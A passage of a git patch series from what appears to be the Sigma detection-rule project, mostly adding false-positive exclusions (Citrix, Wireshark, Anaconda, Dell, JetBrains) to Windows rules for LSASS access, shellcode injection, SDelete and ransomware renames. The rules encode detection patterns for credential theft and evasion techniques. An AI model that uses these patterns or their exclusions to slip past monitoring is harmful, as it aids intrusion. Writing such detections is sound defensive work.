str) + sources = safe_get(logsource_config, 'sources', list) - if not source: - raise BackendError( - f'Lacework backend could not determine source for logsource {logsource_name}') + if sources: + return sources + elif source: + return [source] - return source + raise BackendError( + f'Lacework backend could not determine source for logsource {logsource_name}') @staticmethod def get_query_returns(logsource_name, logsource_config): @@ -703,42 +726,37 @@ class LaceworkPolicy: self.logsource_config = LaceworkQuery.get_logsource_config( config, self.logsource_type, self.logsource_name) - # 3. Get Evaluator Id - self.evaluator_id = LaceworkQuery.get_evaluator_id( - self.logsource_name, self.logsource_config) - - # 4. Get Title - # 5. Get Query ID + # 3. Get Title + # 4. Get Query ID self.title, self.query_id = LaceworkQuery.get_query_id(rule) - # 6. Get Enabled + # 5. Get Enabled self.enabled = False - # 7. Get Policy Type + # 6. Get Policy Type self.policy_type = 'Violation' - # 8. Get Alert Enabled + # 7. Get Alert Enabled self.alert_enabled = False - # 9. Get Alert Profile + # 8. Get Alert Profile self.alert_profile = self.get_alert_profile( self.logsource_name, self.logsource_config) - # 10. Get Limit + # 9. Get Limit self.limit = 1000 - # 11. Get Severity + # 10. Get Severity self.severity = safe_get(rule, 'level', str) or 'medium' - # 12. Get Description + # 11. Get Description self.description = safe_get(rule, 'description', str) - # 13. Get Remediation + # 12. Get Remediation self.remediation = 'Remediation steps are not represented in Sigma rule specification' def __iter__(self): for key, attr in { - 'evaluatorId': 'evaluator_id', 'title': 'title', 'enabled': 'enabled', 'policyType': 'policy_type', From fda2ca4308d826ec7ee20df3b41e2cdf37330ab2 Mon Sep 17 00:00:00 2001 From: Veramine Date: Tue, 20 Sep 2022 17:20:19 -0700 Subject: [PATCH 072/120] Update proc_creation_win_commandline_path_traversal_evasion.yml Fix FP with Citrix launcher --- .../proc_creation_win_commandline_path_traversal_evasion.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml index 0c13c80cc..e63542221 100644 --- a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml +++ b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml @@ -24,8 +24,10 @@ detection: selection2: CommandLine|contains: '.exe\..\' filter: - CommandLine|contains: '\Google\Drive\googledrivesync.exe\..\' + - CommandLine|contains: '\Google\Drive\googledrivesync.exe\..\' + - CommandLine|contains: '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' condition: 1 of selection* and not filter falsepositives: - Google Drive + - Citrix level: high From 411d79017eb8060b380bc977ccb43f61012cd112 Mon Sep 17 00:00:00 2001 From: Veramine Date: Tue, 20 Sep 2022 21:33:16 -0700 Subject: [PATCH 073/120] Update proc_creation_win_commandline_path_traversal_evasion.yml Changed to simpler CommandLine|contains and updated modified date. --- ...roc_creation_win_commandline_path_traversal_evasion.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml index e63542221..c0d988789 100644 --- a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml +++ b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml @@ -3,7 +3,7 @@ status: experimental id: 1327381e-6ab0-4f38-b583-4c1b8346a56b author: Christian Burkard date: 2021/10/26 -modified: 2022/02/02 +modified: 2022/09/20 description: Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal references: - https://twitter.com/hexacorn/status/1448037865435320323 @@ -24,8 +24,9 @@ detection: selection2: CommandLine|contains: '.exe\..\' filter: - - CommandLine|contains: '\Google\Drive\googledrivesync.exe\..\' - - CommandLine|contains: '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' + CommandLine|contains: + - '\Google\Drive\googledrivesync.exe\..\' + - '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' condition: 1 of selection* and not filter falsepositives: - Google Drive From 5fbebce70351d6bd68249d839d534cdb9f7d2b4e Mon Sep 17 00:00:00 2001 From: Veramine Date: Tue, 20 Sep 2022 21:45:45 -0700 Subject: [PATCH 074/120] Update proc_creation_win_commandline_path_traversal_evasion.yml Removed extra space after the hyphen --- .../proc_creation_win_commandline_path_traversal_evasion.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml index c0d988789..d5c4a6811 100644 --- a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml +++ b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml @@ -25,8 +25,8 @@ detection: CommandLine|contains: '.exe\..\' filter: CommandLine|contains: - - '\Google\Drive\googledrivesync.exe\..\' - - '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' + - '\Google\Drive\googledrivesync.exe\..\' + - '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' condition: 1 of selection* and not filter falsepositives: - Google Drive From 59530f49d47fde2b8b9c89c86f94811c8c040bfc Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:53:39 +0200 Subject: [PATCH 075/120] Fix more FP in testing --- ...win_sysinternals_sdelete_file_deletion.yml | 30 ++++++---- .../file_event_win_susp_desktop_ini.yml | 35 ++++++----- .../file_rename_win_ransomware.yml | 11 ++-- .../image_load_side_load_antivirus.yml | 4 +- ...oad_side_load_from_non_system_location.yml | 3 +- .../image_load_susp_python_image_load.yml | 37 ++++++------ .../net_connection_win_python.yml | 21 ++++++- ...ion_win_susp_outbound_smtp_connections.yml | 7 ++- ...ccess_win_direct_syscall_ntopenprocess.yml | 6 ++ ...proc_access_win_rare_proc_access_lsass.yml | 7 ++- ...win_susp_proc_access_lsass_susp_source.yml | 9 +-- ...access_win_shellcode_inject_msf_empire.yml | 32 +++++++++- ...proc_creation_win_expand_cabinet_files.yml | 6 +- .../proc_creation_win_mstsc.yml | 3 +- ...proc_creation_win_susp_codepage_lookup.yml | 3 +- ...ete_removal_com_hijacking_registry_key.yml | 59 ++++++++++--------- 16 files changed, 176 insertions(+), 97 deletions(-) diff --git a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml index be3e39dc3..03798c09f 100644 --- a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml +++ b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml @@ -4,22 +4,26 @@ status: test description: A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files. author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) references: - - https://github.com/OTRF/detection-hackathon-apt29/issues/9 - - https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html + - https://github.com/OTRF/detection-hackathon-apt29/issues/9 + - https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html date: 2020/05/02 -modified: 2021/11/27 +modified: 2022/09/21 logsource: - product: windows - category: file_delete + product: windows + category: file_delete detection: - selection: - TargetFilename|endswith: - - '.AAA' - - '.ZZZ' - condition: selection + selection: + TargetFilename|endswith: + - '.AAA' + - '.ZZZ' + filter_wireshark: + # This event occurs when (un)installing wireshark + TargetFilename: 'C:\Program Files\Wireshark\radius\dictionary.alcatel-lucent.aaa' + condition: selection falsepositives: - - Legitime usage of SDelete + - Legitime usage of SDelete + - An FP may occure if the installation directory of wireshark is changed level: medium tags: - - attack.defense_evasion - - attack.t1070.004 + - attack.defense_evasion + - attack.t1070.004 diff --git a/rules/windows/file_event/file_event_win_susp_desktop_ini.yml b/rules/windows/file_event/file_event_win_susp_desktop_ini.yml index 3dbda7a44..3ac6496fb 100755 --- a/rules/windows/file_event/file_event_win_susp_desktop_ini.yml +++ b/rules/windows/file_event/file_event_win_susp_desktop_ini.yml @@ -4,25 +4,28 @@ status: test description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO) references: - - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ + - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ date: 2020/03/19 -modified: 2021/12/03 +modified: 2022/09/20 logsource: - product: windows - category: file_event + product: windows + category: file_event detection: - selection: - TargetFilename|endswith: '\desktop.ini' - filter: - Image|startswith: - - 'C:\Windows\' - - 'C:\Program Files\' - - 'C:\Program Files (x86)\' - condition: selection and not filter + selection: + TargetFilename|endswith: '\desktop.ini' + filter_generic: + Image|startswith: + - 'C:\Windows\' + - 'C:\Program Files\' + - 'C:\Program Files (x86)\' + filter_jetbrains: + Image|endswith: '\AppData\Local\JetBrains\Toolbox\bin\7z.exe' + TargetFilename|contains: '\JetBrains\apps\' + condition: selection and not 1 of filter_* falsepositives: - - Operations performed through Windows SCCM or equivalent - - Read only access list authority + - Operations performed through Windows SCCM or equivalent + - Read only access list authority level: medium tags: - - attack.persistence - - attack.t1547.009 + - attack.persistence + - attack.t1547.009 diff --git a/rules/windows/file_rename/file_rename_win_ransomware.yml b/rules/windows/file_rename/file_rename_win_ransomware.yml index 72d05ff25..3926f3b6e 100644 --- a/rules/windows/file_rename/file_rename_win_ransomware.yml +++ b/rules/windows/file_rename/file_rename_win_ransomware.yml @@ -7,7 +7,7 @@ references: - https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/ author: frack113 date: 2022/07/16 -modified: 2022/08/31 +modified: 2022/09/20 tags: - attack.impact - attack.t1486 @@ -26,7 +26,7 @@ detection: - '.jpeg' - '.png' - '.pdf' - TargetFilename|contains: + TargetFilename|contains: - '.lnk.' - '.rtf.' - '.pst.' @@ -36,7 +36,7 @@ detection: - '.jpeg.' - '.png.' - '.pdf.' - filter: + filter_generic: TargetFilename|endswith: - '.tmp' - '.bak' @@ -44,7 +44,10 @@ detection: - '.orig' - '.backup' - '.temp' - condition: selection and not filter + filter_anaconda: + TargetFilename|startswith: 'C:\ProgramData\Anaconda3\' + TargetFilename|endswith: '.c~' + condition: selection and not 1 of filter_* falsepositives: - Backup software level: medium diff --git a/rules/windows/image_load/image_load_side_load_antivirus.yml b/rules/windows/image_load/image_load_side_load_antivirus.yml index fd929f098..f2198619d 100644 --- a/rules/windows/image_load/image_load_side_load_antivirus.yml +++ b/rules/windows/image_load/image_load_side_load_antivirus.yml @@ -42,5 +42,7 @@ detection: - 'C:\Program Files (x86)\McAfee\' condition: (selection_bitdefender and not filter_bitdefender) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee) falsepositives: - - Unknown + - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused. + - Dell SARemediation pulgin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file. + - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file level: medium diff --git a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml index de8fc8740..922ae270e 100644 --- a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml +++ b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml @@ -416,8 +416,7 @@ detection: - 'C:\Windows\SysWOW64\' - 'C:\Windows\WinSxS\' - 'C:\Windows\SoftwareDistribution\' - filter_systemp: - ImageLoaded|startswith: 'C:\Windows\SystemTemp\' + - 'C:\Windows\SystemTemp\' filter_appvpolicy: ImageLoaded: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll Image: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe diff --git a/rules/windows/image_load/image_load_susp_python_image_load.yml b/rules/windows/image_load/image_load_susp_python_image_load.yml index 79b4ceff8..8ddb710a6 100644 --- a/rules/windows/image_load/image_load_susp_python_image_load.yml +++ b/rules/windows/image_load/image_load_susp_python_image_load.yml @@ -6,26 +6,27 @@ date: 2020/05/03 modified: 2021/12/05 author: Patrick St. John, OTR (Open Threat Research) tags: - - attack.defense_evasion - - attack.t1027.002 + - attack.defense_evasion + - attack.t1027.002 references: - - https://www.py2exe.org/ - - https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/ + - https://www.py2exe.org/ + - https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/ logsource: - product: windows - category: image_load + product: windows + category: image_load detection: - selection: - Description: 'Python Core' - filter: - - Image|contains: - - 'Python' # FPs with python38.dll, python.exe etc. - - Image|startswith: - - 'C:\Program Files\' - - 'C:\Program Files (x86)\' - condition: selection and not filter + selection: + Description: 'Python Core' + filter: + - Image|contains: + - 'Python' # FPs with python38.dll, python.exe etc. + - Image|startswith: + - 'C:\Program Files\' + - 'C:\Program Files (x86)\' + condition: selection and not filter fields: - - Description + - Description falsepositives: - - Legit Py2Exe Binaries -level: medium \ No newline at end of file + - Legit Py2Exe Binaries + - Known false positive caused with anaconda installation/update +level: medium diff --git a/rules/windows/network_connection/net_connection_win_python.yml b/rules/windows/network_connection/net_connection_win_python.yml index 5e0ec8245..bc3737dcb 100644 --- a/rules/windows/network_connection/net_connection_win_python.yml +++ b/rules/windows/network_connection/net_connection_win_python.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python - https://pypi.org/project/scapy/ date: 2021/12/10 -modified: 2022/08/12 +modified: 2022/09/20 logsource: category: network_connection product: windows @@ -15,7 +15,24 @@ detection: selection: Initiated: 'true' Image|contains: python - condition: selection + filter_conda: + # Related to anaconda updates. Command example: "conda update conda" + # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage + ParentImage: C:\ProgramData\Anaconda3\Scripts\conda.exe + CommandLine|contains|all: + - 'C:\ProgramData\Anaconda3\Scripts\conda-script.py' + - 'update' + filter_conda_jupyter_notebook: + # Related to anaconda opening an instance of Jupyter Notebook + # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage + ParentImage: C:\ProgramData\Anaconda3\python.exe + CommandLine|contains|all: + - 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py' + filter_local_communication: + # This coumd be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances + DestinationIp: 127.0.0.1 + SourceIp: 127.0.0.1 + condition: selection and not 1 of filter_* falsepositives: - Legitimate python script level: medium diff --git a/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml b/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml index 89a6e4bf1..7612f4a7b 100644 --- a/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml +++ b/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml @@ -9,7 +9,7 @@ references: - https://www.ietf.org/rfc/rfc2821.txt author: frack113 date: 2022/01/07 -modified: 2022/02/16 +modified: 2022/09/21 logsource: category: network_connection product: windows @@ -27,7 +27,10 @@ detection: - \outlook.exe filter_mailserver: Image|startswith: 'C:\Program Files\Microsoft\Exchange Server\' - condition: selection and not 1 of filter* + filter_outlook: + Image|startswith: 'C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_' + Image|endswith: '\HxTsr.exe' + condition: selection and not 1 of filter_* falsepositives: - Other SMTP tools level: medium diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml index c0a3ec60a..30041efde 100755 --- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml @@ -44,6 +44,12 @@ detection: falsepositive10: # MS Teams TargetImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' SourceImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' + falsepositives11: + TargetImage: 'C:\Windows\System32\backgroundTaskHost.exe' + SourceImage: 'C:\Windows\System32\backgroundTaskHost.exe' + falsepositives12: + TargetImage: 'C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe' + SourceImage: 'C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe' falsepositive_kerneltrace_edge: # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider Provider_Name: 'Microsoft-Windows-Kernel-Audit-API-Calls' condition: selection and not 1 of falsepositive* diff --git a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml index 26a7bf029..e9f723900 100644 --- a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml +++ b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml @@ -7,7 +7,7 @@ status: experimental description: Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule) author: Florian Roth date: 2022/03/13 -modified: 2022/09/18 +modified: 2022/09/20 references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow @@ -38,8 +38,8 @@ detection: - 'C:\Windows\System32\lsass.exe' - 'C:\WINDOWS\System32\perfmon.exe' - 'C:\WINDOWS\system32\wbem\wmiprvse.exe' - - 'C:\Windows\sysWOW64\wbem\wmiprvse.exe' - - 'C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe' + - 'C:\Windows\sysWOW64\wbem\wmiprvse.exe' + - 'C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe' # Windows Defender filter2: SourceImage|startswith: 'C:\ProgramData\Microsoft\Windows Defender\' @@ -92,6 +92,7 @@ detection: - '\MBAMInstallerService.exe' - '\WebEx\WebexHost.exe ' - '\Programs\Microsoft VS Code\Code.exe' + - '\JetBrains\Toolbox\bin\jetbrains-toolbox.exe' filter_xampp: SourceImage|endswith: '\xampp-control.exe' GrantedAccess: '0x410' diff --git a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml index e984d6e97..726d944dc 100644 --- a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml +++ b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml @@ -4,7 +4,7 @@ status: experimental description: Detects process access to LSASS memory with suspicious access flags and from a suspicious folder author: Florian Roth date: 2021/11/27 -modified: 2022/07/07 +modified: 2022/09/20 references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow @@ -65,6 +65,7 @@ detection: - '\MBAMInstallerService.exe' - '\WebexMTA.exe' - '\WebEx\WebexHost.exe' + - '\JetBrains\Toolbox\bin\jetbrains-toolbox.exe' GrantedAccess: '0x410' filter2: SourceImage|startswith: 'C:\Windows\Temp\' @@ -84,9 +85,9 @@ detection: - '\vs_bootstrapper_' GrantedAccess: '0x1410' filter_chrome: - SourceImage|startswith: 'C:\Program Files (x86)\Google\Temp\' - SourceImage|endswith: '.tmp\GoogleUpdate.exe' - GrantedAccess: '0x410' + SourceImage|startswith: 'C:\Program Files (x86)\Google\Temp\' + SourceImage|endswith: '.tmp\GoogleUpdate.exe' + GrantedAccess: '0x410' condition: selection and not 1 of filter* fields: - User diff --git a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml index 171a30883..b495e82c8 100644 --- a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml +++ b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml @@ -4,6 +4,7 @@ status: experimental description: Detects shellcode injection by Metasploit's migrate and Empire's psinject author: Bhabesh Raj date: 2022/03/11 +modified: 2022/09/21 tags: - attack.defense_evasion - attack.privilege_escalation @@ -13,11 +14,38 @@ logsource: product: windows detection: selection: - GrantedAccess: + GrantedAccess: - '0x147a' - '0x1f3fff' CallTrace|contains: 'UNKNOWN' - condition: selection + filter_dell_folders: + # If dell software is installed we get matches like these + # Example 1: + # SourceImage: C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe + # TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # GrantedAccess: 0x1F3FFF + # Example 2: + # SourceImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe + # TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # GrantedAccess: 0x1F3FFF + # Example 3: + # SourceImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # TargetImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe + # GrantedAccess: 0x1F3FFF + SourceImage|startswith: + - 'C:\Program Files\Dell\' + - 'C:\Program Files (x86)\Dell\' + TargetImage|startswith: + - 'C:\Program Files\Dell\' + - 'C:\Program Files (x86)\Dell\' + GrantedAccess: 0x1F3FFF + CallTrace|startswith: 'C:\Windows\System32\ntdll.dll' + filter_dell_specifc: + SourceImage: C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe + TargetImage: C:\Windows\Explorer.EXE + GrantedAccess: 0x1F3FFF + CallTrace|startswith: 'C:\Windows\System32\ntdll.dll' + condition: selection and not 1 of filter_* falsepositives: - Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well level: high \ No newline at end of file diff --git a/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml b/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml index 1202cc9f2..7bc952889 100644 --- a/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml +++ b/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml @@ -25,7 +25,11 @@ detection: - 'C:\Public\' - '\AppData\Local\Temp\' - '\AppData\Roaming\Temp\' - condition: selection + filter_dell: + # Launched by Dell ServiceShell.exe + ParentImage: 'C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe' + CommandLine|contains: 'C:\ProgramData\Dell\UpdateService\Temp\' + condition: selection and not 1 of filter_* fields: - ComputerName - User diff --git a/rules/windows/process_creation/proc_creation_win_mstsc.yml b/rules/windows/process_creation/proc_creation_win_mstsc.yml index 20df29533..9278e5b04 100644 --- a/rules/windows/process_creation/proc_creation_win_mstsc.yml +++ b/rules/windows/process_creation/proc_creation_win_mstsc.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc date: 2022/01/07 -modified: 2022/09/20 +modified: 2022/09/21 logsource: category: process_creation product: windows @@ -27,6 +27,7 @@ detection: - ' /p' filter_mstsc_1: ParentImage: 'C:\Windows\System32\lxss\wslhost.exe' + CommandLine|contains: 'C:\ProgramData\Microsoft\WSL\wslg.rdp' condition: all of selection_mstsc* and not 1 of filter_mstsc_* or all of selection_cmdkey* falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml index fabb0e86f..fb9250c74 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml @@ -27,7 +27,8 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - Unknown + - During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section + - Other currently unknown cases level: high tags: - attack.discovery diff --git a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml index c6c92af1f..6b6ec4ec7 100644 --- a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml +++ b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml @@ -4,36 +4,41 @@ status: test description: A General detection to trigger for processes removing .*\shell\open\command registry keys. Registry keys that might have been used for COM hijacking activities. author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) references: - - https://github.com/OTRF/detection-hackathon-apt29/issues/7 - - https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html - - https://docs.microsoft.com/en-us/windows/win32/shell/launch - - https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand - - https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code + - https://github.com/OTRF/detection-hackathon-apt29/issues/7 + - https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html + - https://docs.microsoft.com/en-us/windows/win32/shell/launch + - https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand + - https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code date: 2020/05/02 -modified: 2022/03/26 +modified: 2022/09/21 logsource: - product: windows - category: registry_delete + product: windows + category: registry_delete detection: - selection: - EventType: 'DeleteKey' - TargetObject|endswith: '\shell\open\command' - filter_svchost: - Image: 'C:\Windows\system32\svchost.exe' - filter_office: - Image|startswith: - - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\' - - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\' - Image|endswith: '\OfficeClickToRun.exe' - filter_integrator: - Image: 'C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe' - filter_dropbox: - Image|endswith: '\Dropbox.exe' - TargetObject|startswith: 'HKCR\Dropbox.' - condition: selection and not 1 of filter_* + selection: + EventType: 'DeleteKey' + TargetObject|endswith: '\shell\open\command' + filter_svchost: + Image: 'C:\Windows\system32\svchost.exe' + filter_office: + Image|startswith: + - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\' + - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\' + Image|endswith: '\OfficeClickToRun.exe' + filter_integrator: + Image: 'C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe' + filter_dropbox: + Image|endswith: '\Dropbox.exe' + # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) + TargetObject|contains: '\Dropbox.' + filter_wireshark: + Image|endswith: '\AppData\Local\Temp\Wireshark_uninstaller.exe' + # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) + TargetObject|contains: '\wireshark-capture-file\' + condition: selection and not 1 of filter_* falsepositives: - - Unknown + - Unknown level: medium tags: - - attack.defense_evasion - - attack.t1112 + - attack.defense_evasion + - attack.t1112 From e4e2177533693dfbe8948d72d164902187900eb1 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:56:58 +0200 Subject: [PATCH 076/120] Update file_delete_win_sysinternals_sdelete_file_deletion.yml --- .../file_delete_win_sysinternals_sdelete_file_deletion.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml index 03798c09f..9c04a6701 100644 --- a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml +++ b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml @@ -17,12 +17,10 @@ detection: - '.AAA' - '.ZZZ' filter_wireshark: - # This event occurs when (un)installing wireshark - TargetFilename: 'C:\Program Files\Wireshark\radius\dictionary.alcatel-lucent.aaa' + TargetFilename|endswith: '\Wireshark\radius\dictionary.alcatel-lucent.aaa' condition: selection falsepositives: - Legitime usage of SDelete - - An FP may occure if the installation directory of wireshark is changed level: medium tags: - attack.defense_evasion From e987fa6acb9e73e03c46ad905069bd276bf3c008 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:57:10 +0200 Subject: [PATCH 077/120] Update file_delete_win_sysinternals_sdelete_file_deletion.yml --- .../file_delete_win_sysinternals_sdelete_file_deletion.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml index 9c04a6701..64ea228a5 100644 --- a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml +++ b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml @@ -18,7 